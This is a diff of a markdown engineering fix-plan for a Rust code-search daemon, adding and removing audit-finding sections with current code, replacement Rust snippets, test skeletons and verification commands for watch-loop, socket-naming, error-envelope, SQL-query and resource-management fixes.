+3. After increment, if `consecutive_dirty_cycles >= 3` emit a louder warn:
+
+```rust
+state.consecutive_dirty_cycles = state.consecutive_dirty_cycles.saturating_add(1);
+if state.consecutive_dirty_cycles >= 3 {
+    tracing::warn!(
+        cycles = state.consecutive_dirty_cycles,
+        "HNSW has been dirty for {N} cycles — search may serve stale results until \
+         reindex completes; check journalctl for prior errors",
+    );
+}
+```
+
+4. Surface the count in `WatchSnapshot` (add `consecutive_dirty_cycles: u32` field, plumb through `WatchSnapshotInput`).
+
+### Verification
+
+- `cargo build --features gpu-index`.
+- `cargo test --features gpu-index --lib watch_status` for new field's serde round-trip.
+- Manual: simulate failure by `chmod -w` on the index dir, confirm 3+ cycles produce the louder warn.
+
+---
+
+## P2: RB-9 — `wait_for_fresh` infinite poll loop on slow daemon (covered by P2-bundle-wait-fresh)
+
+**See:** P2-bundle-wait-fresh above. RB-9's exponential-backoff and bounded-poll-count fixes are folded into the bundle.
+
+---
+
+## P2: RB-1 — `to_string_lossy()` on path keys (covered by P2-bundle-rb1-rb6)
+
+**See:** P2-bundle-rb1-rb6 above.
+
+---
+
+## P2: RB-6 — `enumerate_files` `unwrap_or(&path)` (covered by P2-bundle-rb1-rb6)
+
+**See:** P2-bundle-rb1-rb6 above.
+
+---
+
+## P2: AC-V1.30.1-3 — BFS `bfs_expand` cap check skips score-bump for already-visited neighbors
+
+**Files:** `src/gather.rs:357-381`
+**Effort:** ~30 minutes
+**Why:** Inner cap check at line 357 fires *before* the visited-neighbor score-bump at line 366-377. When the cap fires partway through a high-fanout node's neighbors, downstream nodes that *would* have had their score bumped to a higher value keep their stale lower score. Quality degrades silently at the cap boundary.
+
+### Current code
+
+```rust
+// src/gather.rs:341-383
+    while let Some((name, depth)) = queue.pop_front() {
+        if depth >= opts.expand_depth {
+            continue;
+        }
+        if name_scores.len() >= opts.max_expanded_nodes && visited.len() > initial_size {
+            expansion_capped = true;
+            break;
+        }
+
+        let neighbors = get_neighbors(graph, &name, opts.direction);
+        let base_score = name_scores
+            .get(name.as_ref())
+            .map(|(s, _)| *s)
+            .unwrap_or(0.5);
+        let new_score = base_score * opts.decay_factor;
+        for neighbor in neighbors {
+            if name_scores.len() >= opts.max_expanded_nodes {
+                expansion_capped = true;
+                break;
+            }
+            if !visited.contains(&neighbor) {
+                visited.insert(Arc::clone(&neighbor));
+                let key: String = neighbor.to_string();
+                name_scores.insert(key, (new_score, depth + 1));
+                queue.push_back((neighbor, depth + 1));
+            } else if let Some(existing) = name_scores.get_mut(neighbor.as_ref()) {
+                if new_score > existing.0 {
+                    existing.0 = new_score;
+                    existing.1 = existing.1.min(depth + 1);
+                }
+            }
+        }
+        if expansion_capped {
+            break;
+        }
+    }
+```
+
+### Replacement / approach
+
+```rust
+        for neighbor in neighbors {
+            if !visited.contains(&neighbor) {
+                // Cap is on `name_scores.len()`, only checked for new
+                // insertions. Already-visited bumps below don't grow
+                // the map, so let them through unconditionally.
+                if name_scores.len() >= opts.max_expanded_nodes {
+                    expansion_capped = true;
+                    break;
+                }
+                visited.insert(Arc::clone(&neighbor));
+                let key: String = neighbor.to_string();
+                name_scores.insert(key, (new_score, depth + 1));
+                queue.push_back((neighbor, depth + 1));
+            } else if let Some(existing) = name_scores.get_mut(neighbor.as_ref()) {
+                // AC-V1.30.1-3: always run the score-bump even when the
+                // cap is reached; the bump doesn't grow `name_scores`.
+                if new_score > existing.0 {
+                    existing.0 = new_score;
+                    existing.1 = existing.1.min(depth + 1);
+                }
+            }
+        }
+```
+
+### Tests to add
+
+```rust
+#[test]
+fn bfs_expand_score_bump_runs_when_cap_reached() {
+    // Construct a graph where two seeds both expand into a shared third
+    // node N. Set max_expanded_nodes such that the cap fires after the
+    // first seed's expansion. Assert N's score is the max of the two
+    // seeds' decayed scores, not whichever the BFS reached first.
+}
+```
+
+### Verification
+
+- `cargo test --features gpu-index --lib gather -- bfs_expand`.
+
+---
+
+## P2: AC-V1.30.1-9 — `daemon_socket_path` uses `DefaultHasher`
+
+**Files:** `src/daemon_translate.rs:174-205`
+**Effort:** ~30 minutes
+**Why:** `DefaultHasher` uses Rust-version-dependent SipHash. A `cargo update` of std could change socket names, breaking systemd `cqs-watch` units that hardcode a previous socket path. Codebase already depends on `blake3` for content hashing.
+
+### Current code
+
+```rust
+// src/daemon_translate.rs:174-205
+#[cfg(unix)]
+pub fn daemon_socket_path(cqs_dir: &std::path::Path) -> std::path::PathBuf {
+    use std::collections::hash_map::DefaultHasher;
+    use std::hash::{Hash, Hasher};
+    use std::path::PathBuf;
+
+    let sock_dir = match std::env::var_os("XDG_RUNTIME_DIR") {
+        // ... unchanged ...
+    };
+    let sock_name = format!("cqs-{:x}.sock", {
+        let mut h = DefaultHasher::new();
+        cqs_dir.hash(&mut h);
+        h.finish()
+    });
+    sock_dir.join(sock_name)
+}
+```
+
+### Replacement / approach
+
+```rust
+#[cfg(unix)]
+pub fn daemon_socket_path(cqs_dir: &std::path::Path) -> std::path::PathBuf {
+    use std::path::PathBuf;
+
+    let sock_dir = match std::env::var_os("XDG_RUNTIME_DIR") {
+        // ... unchanged ...
+    };
+    // AC-V1.30.1-9: BLAKE3 is stable across Rust versions — important
+    // because systemd unit files hardcode the resulting socket path.
+    // Truncate to 8 hex bytes (16 chars) — collision probability for
+    // 100 projects is ~1e-15.
+    let canonical_path_bytes = cqs_dir.as_os_str().as_encoded_bytes();
+    let hash = blake3::hash(canonical_path_bytes);
+    let truncated = &hash.as_bytes()[..8];
+    let sock_name = format!(
+        "cqs-{}.sock",
+        truncated.iter().map(|b| format!("{:02x}", b)).collect::<String>()
+    );
+    sock_dir.join(sock_name)
+}
+```
+
+### Migration note (one-time operator action)
+
+This is a wire-format change to the socket name, not just an internal refactor. The existing `DefaultHasher` produces variable-length unpadded hex (`cqs-deadbeef.sock`), the BLAKE3 + 8-byte truncation produces fixed 16-char hex (`cqs-1234567890abcdef.sock`). For a given `cqs_dir` the new hash is **different** from the old — operators with a running `cqs-watch` systemd unit must:
+
+```bash
+systemctl --user restart cqs-watch
+# old socket abandoned; daemon binds new path; CLI auto-discovers via XDG_RUNTIME_DIR
+```
+
+CLI auto-connects (the wrapper at `src/cli/files.rs:26` calls the same path resolver), so once the daemon binds the new name, queries find it. The transition window is one restart, no config files to edit. Ship this in the same release as the rest of v1.30.x or operators will see "daemon not responding" until they restart.
+
+### Verification
+
+- `cargo build --features gpu-index`.
+- `cargo test --features gpu-index --lib daemon_translate -- daemon_socket_path` passes (existing tests should still hash to deterministic outputs).
+- Pin a regression test: hash for a known input path (e.g. `/tmp/foo`) returns a known fixed string.
+- After the upgrade, smoke-test: `systemctl --user restart cqs-watch && cqs status --json` should return a non-error envelope within 2 seconds.
+
+---
+
+## P2: AC-V1.30.1-10 — `incremental_count = 0` reset on idle-clear loses delta context
+
+**Files:** `src/cli/watch/mod.rs:1175-1182`
+**Effort:** ~30 minutes
+**Why:** When the watch loop has been idle ~5 minutes, it clears the embedder session AND resets `state.incremental_count = 0` AND drops `state.hnsw_index`. The counter reset is the bug: counter should track "incremental inserts since last full rebuild", not "since last embedder-session reset". Resetting on idle understates delta size and delays the next threshold-driven rebuild.
+
+### Current code
+
+```rust
+// src/cli/watch/mod.rs:1175-1182
+                    if cycles_since_clear >= 3000 {
+                        if let Some(emb) = shared_embedder.get() {
+                            emb.clear_session();
+                        }
+                        state.hnsw_index = None;
+                        state.incremental_count = 0;
+                        cycles_since_clear = 0;
+                    }
+```
+
+### Replacement / approach
+
+```rust
+                    if cycles_since_clear >= 3000 {
+                        if let Some(emb) = shared_embedder.get() {
+                            emb.clear_session();
+                        }
+                        // AC-V1.30.1-10: do NOT reset incremental_count
+                        // on idle-clear. The counter's contract is
+                        // "incremental inserts since last full rebuild";
+                        // a 5-minute idle hasn't changed the on-disk
+                        // delta. Resetting here means the next file
+                        // event starts the threshold timer from scratch
+                        // and understates delta size, delaying the
+                        // rebuild that should fire on accumulated drift.
+                        state.hnsw_index = None;
+                        cycles_since_clear = 0;
+                    }
+```
+
+### Test to add
+
+```rust
+#[test]
+fn incremental_count_persists_across_idle_clear() {
+    // Set state.incremental_count = threshold - 1, simulate 3000-tick
+    // idle, push one file event, assert a full rebuild fires (not an
+    // incremental insert). Mock the rebuild via a callback counter.
+}
+```
+
+### Verification
+
+- `cargo build --features gpu-index`.
+- `cargo test --features gpu-index --lib watch -- incremental_count`.
+
+---
+
+## P2: API-V1.30.1-1 — `cqs status --wait` emits success envelope but exits 1 on timeout
+
+**Reframed during verification:** original prompt referenced `error_codes::TIMEOUT` which does not exist — the real `error_codes` module (`src/cli/json_envelope.rs:125-139`) only defines `NOT_FOUND`, `INVALID_INPUT`, `PARSE_ERROR`, `IO_ERROR`, `INTERNAL`. Replacement now extends `ErrorCode` enum with a `Timeout` variant + `error_codes::TIMEOUT` constant (the cleanest fix, in keeping with the existing single-source-of-truth pattern at `src/cli/json_envelope.rs:80-138`).
+
+**Files:** `src/cli/commands/infra/status.rs:85-90`, `src/cli/json_envelope.rs:80-139` (extension)
+**Effort:** ~30 minutes
+**Why:** On `Timeout`, the command emits the success-envelope JSON via `emit_snapshot` *and* exits 1. JSON consumers see `{"status":"ok",...}` then a non-zero exit code — contradicts the contract that error envelopes have `status:"err"`. A scripted consumer parsing the envelope alone gets the wrong answer.
+
+### Current code
+
+```rust
+// src/cli/commands/infra/status.rs:85-90
+            cqs::daemon_translate::FreshnessWait::Timeout(snap) => {
+                emit_snapshot(&snap, json)?;
+                // Budget expired before fresh — surface as exit 1
+                // so scripts can distinguish "fresh" from "timed
+                // out still stale".
+                std::process::exit(1);
+            }
+```
+
+### Replacement / approach
+
+**Step 1.** Extend the `ErrorCode` enum + `error_codes` module in `src/cli/json_envelope.rs`. The current set covers `NotFound`, `InvalidInput`, `ParseError`, `IoError`, `Internal`. Add a `Timeout` variant alongside:
+
+```rust
+// src/cli/json_envelope.rs:80-93 — add to the enum
+pub enum ErrorCode {
+    NotFound,
+    InvalidInput,
+    ParseError,
+    IoError,
+    Internal,
+    /// Operation exceeded its time budget (status --wait, eval timeout, etc).
+    Timeout,
+}
+
+// src/cli/json_envelope.rs:96-106 — add the as_str arm
+impl ErrorCode {
+    pub const fn as_str(&self) -> &'static str {
+        match self {
+            ErrorCode::NotFound => "not_found",
+            ErrorCode::InvalidInput => "invalid_input",
+            ErrorCode::ParseError => "parse_error",
+            ErrorCode::IoError => "io_error",
+            ErrorCode::Internal => "internal",
+            ErrorCode::Timeout => "timeout",
+        }
+    }
+}
+
+// src/cli/json_envelope.rs:125-139 — add the constant
+pub mod error_codes {
+    use super::ErrorCode;
+    pub const NOT_FOUND: &str = ErrorCode::NotFound.as_str();
+    pub const INVALID_INPUT: &str = ErrorCode::InvalidInput.as_str();
+    pub const PARSE_ERROR: &str = ErrorCode::ParseError.as_str();
+    pub const IO_ERROR: &str = ErrorCode::IoError.as_str();
+    pub const INTERNAL: &str = ErrorCode::Internal.as_str();
+    /// Operation exceeded its time budget. Used by `cqs status --wait`
+    /// timeout and any future time-bounded operation that times out
+    /// before producing a result.
+    pub const TIMEOUT: &str = ErrorCode::Timeout.as_str();
+}
+```
+
+The `ErrorCode` enum is `#[non_exhaustive]` so adding a variant is non-breaking.
+
+**Step 2.** `emit_json_error_with_data` does not exist (verified — only `emit_json_error` exists at `src/cli/json_envelope.rs:352`). Add it as a thin variant beside `emit_json_error`:
+
+```rust
+// src/cli/json_envelope.rs — new helper next to emit_json_error
+/// Like `emit_json_error` but carries an optional `data` payload alongside
+/// the error so consumers can still surface counters (snapshot, wait_secs,
+/// etc). Used by `cqs status --wait` timeout to embed the stale snapshot
+/// in the error envelope.
+pub fn emit_json_error_with_data(
+    code: &str,
+    message: &str,
+    data: Option<serde_json::Value>,
+) -> Result<()> {
+    let mut env = serde_json::Map::with_capacity(4);
+    env.insert(
+        "data".to_string(),
+        data.unwrap_or(serde_json::Value::Null),
+    );
+    env.insert(
+        "error".to_string(),
+        serde_json::json!({"code": code, "message": message}),
+    );
     env.insert(
         "version".to_string(),
         serde_json::Value::Number(JSON_OUTPUT_VERSION.into()),
     );
-    serde_json::Value::Object(env)
-}
-```
-
-### Notes
-
-Even better follow-on: change `wrap_value(payload: serde_json::Value) -> serde_json::Value` so the outer clone disappears entirely. Most callers (`batch/mod.rs::write_json_line`) already produce the value just-in-time. Out of scope here unless verifier wants to bundle.
-
----
-
-## P2.70 — build_graph correlated subquery for n_callers
-
-**Finding:** P2.70 in audit-triage.md
-**Files:** `src/serve/data.rs:234-264`
-**Why:** Per-row `(SELECT COUNT(*) FROM function_calls WHERE callee_name = c.name)` is O(N × log M) where N=ABS_MAX_GRAPH_NODES, M=function_calls row count. `LEFT JOIN (... GROUP BY)` is O(M+N).
-
-### Current code
-
-`src/serve/data.rs:234-264`:
-
-```rust
-        let mut node_query = "SELECT c.id, c.name, c.chunk_type, c.language, c.origin, \
-                    c.line_start, c.line_end, \
-                    COALESCE((SELECT COUNT(*) FROM function_calls fc \
-                              WHERE fc.callee_name = c.name), 0) AS n_callers_global \
-             FROM chunks c \
-             WHERE 1=1"
-            .to_string();
-        let mut binds: Vec<String> = Vec::new();
-        if let Some(file) = file_filter {
-            let escaped = file.replace('\\', "\\\\").replace('%', "\\%").replace('_', "\\_");
-            node_query.push_str(" AND c.origin LIKE ? ESCAPE '\\'");
-            binds.push(format!("{escaped}%"));
-        }
-        if let Some(kind) = kind_filter {
-            node_query.push_str(" AND c.chunk_type = ?");
-            binds.push(kind.to_string());
-        }
-        node_query.push_str(" ORDER BY n_callers_global DESC, c.id ASC LIMIT ?");
-        binds.push(effective_cap.to_string());
-```
-
-### Replacement
-
-```rust
-        // PF-V1.30: replace per-row correlated subquery with one aggregated
-        // subselect joined by name. Previously each scanned row triggered a
-        // log-N index probe into function_calls (~75k probes for a 5000-cap
-        // graph against a 30k-edge corpus). One GROUP BY pass is O(M+N).
-        let mut node_query = "SELECT c.id, c.name, c.chunk_type, c.language, c.origin, \
-                    c.line_start, c.line_end, \
-                    COALESCE(cc.n, 0) AS n_callers_global \
-             FROM chunks c \
-             LEFT JOIN (SELECT callee_name, COUNT(*) AS n \
-                        FROM function_calls GROUP BY callee_name) cc \
-               ON cc.callee_name = c.name \
-             WHERE 1=1"
-            .to_string();
-```
-
-Rest of the function (file_filter, kind_filter, ORDER BY, LIMIT) is unchanged.
-
-### Notes
-
-`build_hierarchy` at `src/serve/data.rs:670-754` has the same shape per the audit — apply the same JOIN there. Add an explain-plan smoke test if practical, otherwise a benchmark assertion on a large fixture.
-
----
-
-## P2.71–P2.77, P2.92 — Resource Management cluster
-
-**Finding:** P2.71–P2.77 and P2.92 in audit-triage.md
-**Files:** Multiple — see individual sub-sections.
-**Why:** Eight resource-management findings introduced in v1.30.0. Most are independent fixes; group together because all are easy-to-medium and share the "v1.30.0 introduced bounded-resource leaks" theme.
-
----
-
-### P2.71 — Background HNSW rebuild thread detached
-
-**File:** `src/cli/watch.rs:965-1042` (`spawn_hnsw_rebuild`)
-
-#### Current code
-
-`src/cli/watch.rs:1031-1042`:
-
-```rust
-    if let Err(e) = thread_result {
-        tracing::warn!(error = %e, context, "Failed to spawn HNSW rebuild thread");
-    }
-    PendingRebuild {
-        rx,
-        delta: Vec::new(),
-        started_at,
-    }
-```
-
-The `JoinHandle` returned by `thread_result` is `Result<JoinHandle, _>` — currently used only for the spawn-error log. Drop sites the `JoinHandle`.
-
-#### Replacement
-
-Hold the `JoinHandle` inside `PendingRebuild`. On daemon shutdown, `join()` it with a bounded timeout.
-
-```rust
-struct PendingRebuild {
-    rx: std::sync::mpsc::Receiver<RebuildOutcome>,
-    delta: Vec<(String, Embedding)>,
-    started_at: std::time::Instant,
-    handle: Option<std::thread::JoinHandle<()>>,
-}
-```
-
-```rust
-    let handle = match thread_result {
-        Ok(h) => Some(h),
-        Err(e) => {
-            tracing::warn!(error = %e, context, "Failed to spawn HNSW rebuild thread");
-            None
-        }
-    };
-    PendingRebuild { rx, delta: Vec::new(), started_at, handle }
-```
-
-On the daemon shutdown path (the `loop` exit in `cmd_watch`), join the handle before letting the daemon exit. If the audit confirms a `state.pending_rebuild.take()` happens during normal swap, this just adds shutdown handling.
-
-### Notes
-
-A bounded timeout via spinning on `JoinHandle::is_finished()` plus a final detached-drop would be the least invasive — full join needs cancellation flag plumbed through `build_hnsw_index_owned`. Audit calls out cancellation as the proper fix; mark as follow-on issue.
-
----
-
-### P2.72 — pending_rebuild.delta unbounded
-
-**File:** `src/cli/watch.rs:611, 2667-2674, 2740-2741`
-
-#### Current code
-
-`src/cli/watch.rs:611, 623-626`:
-
-```rust
-struct PendingRebuild {
-    rx: std::sync::mpsc::Receiver<RebuildOutcome>,
-    delta: Vec<(String, Embedding)>,
-    started_at: std::time::Instant,
-}
-```
-
-The `delta.push((id, emb))` site at lines ~2667-2674 has no cap.
-
-#### Replacement
-
-Add a cap and a saturation flag:
-
-```rust
-const MAX_PENDING_REBUILD_DELTA: usize = 5_000;
-
-// at the push site:
-if let Some(ref mut pending) = state.pending_rebuild {
-    if pending.delta.len() >= MAX_PENDING_REBUILD_DELTA {
-        if !pending.delta_saturated {
-            tracing::warn!(
-                cap = MAX_PENDING_REBUILD_DELTA,
-                "pending HNSW rebuild delta saturated; abandoning in-flight rebuild — \
-                 next threshold rebuild will pick up changes from SQLite"
-            );
-            pending.delta_saturated = true;
-        }
-        // Drop newest events; the next threshold_rebuild reads from SQLite anyway.
-    } else {
-        pending.delta.push((chunk_id, embedding));
-    }
-}
-```
-
-Add `delta_saturated: bool` to `PendingRebuild`. On swap, if `delta_saturated`, abandon the rebuilt index (set `pending = None`) so we don't ship a stale snapshot.
-
-### Notes
-
-Combine with P2.71 — same struct, same surgery. Verifier should land both in one PR.
-
----
-
-### P2.73 — LocalProvider stash retains all submitted batch results
-
-**File:** `src/llm/local.rs:74, 304-309, 542-547`
-
-#### Current code
-
-`src/llm/local.rs:304-311`:
-
-```rust
-        let results_map = results.into_inner().unwrap_or_default();
-        self.stash
-            .lock()
-            .unwrap()
-            .insert(batch_id.clone(), results_map);
-
-        Ok(batch_id)
-```
-
-#### Replacement
-
-Cap stash size and clear failed batches.
-
-```rust
-        let results_map = results.into_inner().unwrap_or_default();
-        let mut stash = self.stash
-            .lock()
-            .unwrap_or_else(|p| p.into_inner());
-
-        // Cap total stash entries — if we exceed MAX_STASH_BATCHES, evict
-        // oldest by insertion order (HashMap doesn't preserve order; switch
-        // to `IndexMap` if available, else use a `VecDeque<String>` of
-        // insertion order tracked alongside).
-        const MAX_STASH_BATCHES: usize = 128;
-        while stash.len() >= MAX_STASH_BATCHES {
-            // Pick an arbitrary key to evict — production callers fetch in FIFO
-            // order, so any non-current key is dead weight.
-            if let Some(stale_key) = stash.keys().next().cloned() {
-                stash.remove(&stale_key);
-                tracing::warn!(
-                    batch_id = %stale_key,
-                    "LocalProvider stash exceeded cap; evicting oldest entry"
-                );
-            } else {
-                break;
-            }
-        }
-        stash.insert(batch_id.clone(), results_map);
-        drop(stash);
-        Ok(batch_id)
-```
-
-Also: in the auth-fail Err arm at `:286`, explicitly `stash.remove(&batch_id)` before returning Err.
-
-### Notes
-
-The audit recommends an LRU; `MAX_STASH_BATCHES=128` is a plain cap. If `IndexMap` is not in deps, this is acceptable — the assumption is that production callers drain in submit-order so the cap rarely fires. Add a regression test that submits 200 batches without fetching, asserts `stash.len() == 128`.
-
----
-
-### P2.74 — Daemon never checks fs.inotify.max_user_watches
-
-**File:** `src/cli/watch.rs:1947-1949`
-
-#### Current code
-
-`src/cli/watch.rs:1947-1949`:
-
-```rust
-        Box::new(RecommendedWatcher::new(tx, config)?)
-    };
-    watcher.watch(&root, RecursiveMode::Recursive)?;
-```
-
-#### Replacement
-
-Read `/proc/sys/fs/inotify/max_user_watches` at startup, count directories under `root` honoring gitignore, warn if >90% of limit.
-
-```rust
-        Box::new(RecommendedWatcher::new(tx, config)?)
-    };
-
-    // RM-V1.30: warn when the project tree approaches the inotify watch
-    // limit. notify::watch(Recursive) registers a watch per directory; on
-    // distros with the old default of 8192 a moderately-deep monorepo
-    // exhausts the limit and per-subdir registration failures are silent.
-    #[cfg(target_os = "linux")]
-    if !use_poll {
-        if let Ok(limit_str) = std::fs::read_to_string("/proc/sys/fs/inotify/max_user_watches") {
-            if let Ok(limit) = limit_str.trim().parse::<usize>() {
-                let dir_count = count_watchable_dirs(&root);
-                if dir_count * 10 > limit * 9 {
-                    tracing::warn!(
-                        dir_count,
-                        limit,
-                        "inotify watch limit nearly exhausted; consider \
-                         `cqs watch --poll` or `sudo sysctl -w fs.inotify.max_user_watches={}`",
-                        limit * 4
-                    );
-                }
-            }
-        }
-    }
-
-    watcher.watch(&root, RecursiveMode::Recursive)?;
-```
-
-```rust
-#[cfg(target_os = "linux")]
-fn count_watchable_dirs(root: &Path) -> usize {
-    let mut count = 0usize;
-    let walker = ignore::WalkBuilder::new(root)
-        .hidden(false)
-        .build();
-    for entry in walker.flatten() {
-        if entry.file_type().is_some_and(|t| t.is_dir()) {
-            count += 1;
-        }
-    }
-    count
-}
-```
-
-### Notes
-
-`ignore::WalkBuilder` is already a dep (used elsewhere). The alternative — manually descending and registering only non-ignored dirs — is the audit's recommended deeper fix; mark as follow-on issue.
-
----
-
-### P2.75 — select_provider triggers CUDA probe + symlink ops on every CLI process
-
-**File:** `src/embedder/provider.rs:171-248`, `src/embedder/mod.rs:312-313`
-
-#### Current code
-
-`src/embedder/provider.rs:171-173`:
-
-```rust
-pub(crate) fn select_provider() -> ExecutionProvider {
-    *CACHED_PROVIDER.get_or_init(detect_provider)
-}
-```
-
-`Embedder::new` (`src/embedder/mod.rs:312-313`) calls `select_provider()` unconditionally during construction — even on `cqs notes list` / `cqs slot list` / etc. that never run an inference.
-
-#### Replacement
-
-Defer the probe to first inference. Replace eager `select_provider()` call in `Embedder::new` with a lazy `OnceLock<ExecutionProvider>` populated in `Session::create_session`.
-
-The minimal change: introduce `Embedder::provider_lazy()` that calls `select_provider()` on first use, and have `embed_query`/`embed_documents` route through it. `Embedder::new` stops eagerly resolving the provider.
-
-```rust
-// In Embedder struct:
-provider: std::sync::OnceLock<ExecutionProvider>,
-
-// New helper:
-fn provider(&self) -> ExecutionProvider {
-    *self.provider.get_or_init(crate::embedder::provider::select_provider)
-}
-
-// Session::create_session and other call sites use self.provider() instead
-// of self.provider.
-```
-
-Update `Embedder::new` to pass the resolved-or-deferred provider to the struct. Remove the eager `select_provider()` call.
-
-### Notes
-
-Verifier needs to read `Embedder::new` and `Session::create_session` signatures to thread this through. The audit's bigger-picture recommendation (move probe inside `Session::create_session`) is the right end state. Pragmatic minimum: keep the `OnceLock` outside session, lazy on first access.
-
----
-
-### P2.76 — serve handlers spawn_blocking unbounded
-
-**File:** `src/serve/handlers.rs:86-89` + 5 sites + `src/serve/mod.rs:92-95`
-
-#### Current code
-
-`src/serve/mod.rs:92-95`:
-
-```rust
-    let runtime = tokio::runtime::Builder::new_multi_thread()
-        .enable_all()
-        .build()
-```
-
-Default `max_blocking_threads=512`.
-
-#### Replacement
-
-```rust
-    let runtime = tokio::runtime::Builder::new_multi_thread()
-        .worker_threads(num_cpus::get().min(4))
-        .max_blocking_threads(8)
-        .enable_all()
-        .build()
-```
-
-### Notes
-
-8 concurrent SQL queries is plenty for an interactive single-user UI. Combined with worker_threads cap, daemon's max steady-state thread count is bounded at 12 (vs. 512+num_cpus today). Optionally wrap each handler's `spawn_blocking` in `tokio::time::timeout(30s, ...)` — separate change, mark follow-on.
-
-If `num_cpus` not in deps, use `std::thread::available_parallelism()` directly.
-
----
-
-### P2.77 — Embedder clear_session doubled-memory window
-
-**File:** `src/embedder/mod.rs:261, 808-823`
-
-#### Current code
-
-`src/embedder/mod.rs:808-823`:
-
-```rust
-    pub fn clear_session(&self) {
-        let mut guard = self.session.lock().unwrap_or_else(|p| p.into_inner());
-        *guard = None;
-        let mut cache = self.query_cache.lock().unwrap_or_else(|p| p.into_inner());
-        cache.clear();
-        let mut tok = self.tokenizer.lock().unwrap_or_else(|p| p.into_inner());
-        *tok = None;
-        tracing::info!("Embedder session, query cache, and tokenizer cleared");
-    }
-```
-
-#### Replacement
-
-Surface the doubled-memory window via tracing, since the deeper fix (RwLock around tokenizer to wait for in-flight inference) extends the inference critical section.
-
-```rust
-    pub fn clear_session(&self) {
-        let mut guard = self.session.lock().unwrap_or_else(|p| p.into_inner());
-        *guard = None;
-        let mut cache = self.query_cache.lock().unwrap_or_else(|p| p.into_inner());
-        cache.clear();
-        let mut tok = self.tokenizer.lock().unwrap_or_else(|p| p.into_inner());
-        // RM-V1.30: surface the doubled-memory window when in-flight
-        // inference holds an Arc clone of the tokenizer concurrent with
-        // the next-use lazy reload. Strong count > 1 means another thread
-        // is mid-encode; the inner Option clears here, but the cloned Arc
-        // keeps the old tokenizer alive until that thread releases it,
-        // so peak memory transiently exceeds documented ~500MB by the
-        // tokenizer size (~10-20MB).
-        if let Some(t) = tok.as_ref() {
-            let strong = std::sync::Arc::strong_count(t);
-            if strong > 1 {
-                tracing::info!(
-                    strong_count = strong,
-                    stage = "clear_during_inference",
-                    "tokenizer Arc still referenced by in-flight inference; \
-                     transient doubled-memory window during reload"
-                );
-            }
-        }
-        *tok = None;
-        tracing::info!("Embedder session, query cache, and tokenizer cleared");
-    }
-```
-
-### Notes
-
-Audit calls option (a) — RwLock around tokenizer with clear taking write lock — as higher-risk because it extends the inference critical section. Option (b) here just surfaces the cost so operators can correlate memory spikes. Mark option (a) as follow-on issue.
-
----
-
-### P2.92 — Embedder::new opens fresh QueryCache + 7-day prune on every CLI command
-
-**File:** `src/embedder/mod.rs:355-366`
-
-#### Current code
-
-`src/embedder/mod.rs:353-366`:
-
-```rust
-        // Best-effort disk cache for query embeddings. Opens a small SQLite
-        // DB at ~/.cache/cqs/query_cache.db. Failure is non-fatal.
-        let disk_query_cache =
-            match crate::cache::QueryCache::open(&crate::cache::QueryCache::default_path()) {
-                Ok(c) => {
-                    let _ = c.prune_older_than(7);
-                    Some(c)
-                }
-                Err(e) => {
-                    tracing::debug!(error = %e, "Disk query cache unavailable (non-fatal)");
-                    None
-                }
-            };
-```
-
-#### Replacement
-
-Lazy-open. Replace `Option<QueryCache>` with `OnceLock<Option<QueryCache>>` and open on first `embed_query`.
-
-```rust
-// Struct field change:
-// disk_query_cache: Option<crate::cache::QueryCache>,
-// →
-disk_query_cache: std::sync::OnceLock<Option<crate::cache::QueryCache>>,
-
-// In Embedder::new — drop the eager open block. Initialize the OnceLock
-// empty:
-disk_query_cache: std::sync::OnceLock::new(),
-
-// New accessor:
-fn disk_query_cache(&self) -> Option<&crate::cache::QueryCache> {
-    self.disk_query_cache
-        .get_or_init(|| {
-            match crate::cache::QueryCache::open(
-                &crate::cache::QueryCache::default_path(),
-            ) {
-                Ok(c) => {
-                    let _ = c.prune_older_than(7);
-                    Some(c)
-                }
-                Err(e) => {
-                    tracing::debug!(
-                        error = %e,
-                        "Disk query cache unavailable (non-fatal)"
-                    );
-                    None
-                }
-            }
-        })
-        .as_ref()
-}
-```
-
-Update every site that uses `self.disk_query_cache` to call `self.disk_query_cache()`.
-
-### Notes
-
-The audit calls out 16 call sites that construct an embedder via `try_model_config` for commands that never call `embed_query` — `notes list`, `slot list`, `cache stats`. Lazy-open eliminates the WSL DrvFS 30-50ms cold-open per CLI invocation.
-
----
-
-## P2.78–P2.87 — Test Coverage (happy-path) cluster
-
-**Finding:** P2.78–P2.87 in audit-triage.md
-**Why:** Every v1.30.0 surface (#1113 HNSW rebuild, #1114 registry, #1118 auth, #1120 provider, serve data, batch dispatch handlers, LLM passes) shipped without tests. Bundle into a coherent test-debt PR series.
-
-Group structure: each test cluster gets one prompt with a test skeleton. Tests use `InProcessFixture` style seeding.
-
----
-
-### P2.78 — TC-HAP: serve data endpoints (build_graph, build_chunk_detail, build_hierarchy, build_cluster) untested with populated data
-
-**Files:** `src/serve/data.rs:192,452,586,825,933`, `src/serve/tests.rs:25` (`fixture_state` is empty-only).
-
-#### Test skeleton
-
-Add `src/serve/tests/data_populated.rs` (or extend `tests.rs`):
-
-```rust
-// Seed: process_data → validate → format_output, plus one test chunk.
-// Assert build_graph returns 3 nodes + 2 call edges; max_nodes=1 truncates;
-// kind_filter excludes tests.
-
-#[test]
-fn build_graph_returns_seeded_nodes_and_edges() {
-    let fx = InProcessFixture::seed_minimal_call_graph();
-    let result = build_graph(&fx.store, None, None, None).unwrap();
-    assert_eq!(result.nodes.len(), 3);
-    assert_eq!(result.edges.len(), 2);
-}
-
-#[test]
-fn build_graph_max_nodes_truncates() {
-    let fx = InProcessFixture::seed_minimal_call_graph();
-    let result = build_graph(&fx.store, None, None, Some(1)).unwrap();
-    assert_eq!(result.nodes.len(), 1);
-}
-
-#[test]
-fn build_chunk_detail_returns_callers_callees_tests() {
-    let fx = InProcessFixture::seed_minimal_call_graph();
-    let detail = build_chunk_detail(&fx.store, "process_data_chunk_id").unwrap().unwrap();
-    assert_eq!(detail.callers.len(), 0);
-    assert_eq!(detail.callees.len(), 2);
-    assert_eq!(detail.tests.len(), 1);
-}
-
-#[test]
-fn build_hierarchy_callees_returns_subtree() {
-    let fx = InProcessFixture::seed_minimal_call_graph();
-    let h = build_hierarchy(&fx.store, "process_data", Direction::Callees, 5).unwrap();
-    assert_eq!(h.nodes.len(), 3);
-}
-
-#[test]
-fn build_cluster_returns_nodes_when_umap_populated() {
-    let fx = InProcessFixture::seed_with_umap_coords();
-    let result = build_cluster(&fx.store, None).unwrap();
-    assert!(!result.nodes.is_empty());
-}
-```
-
-### Notes
-
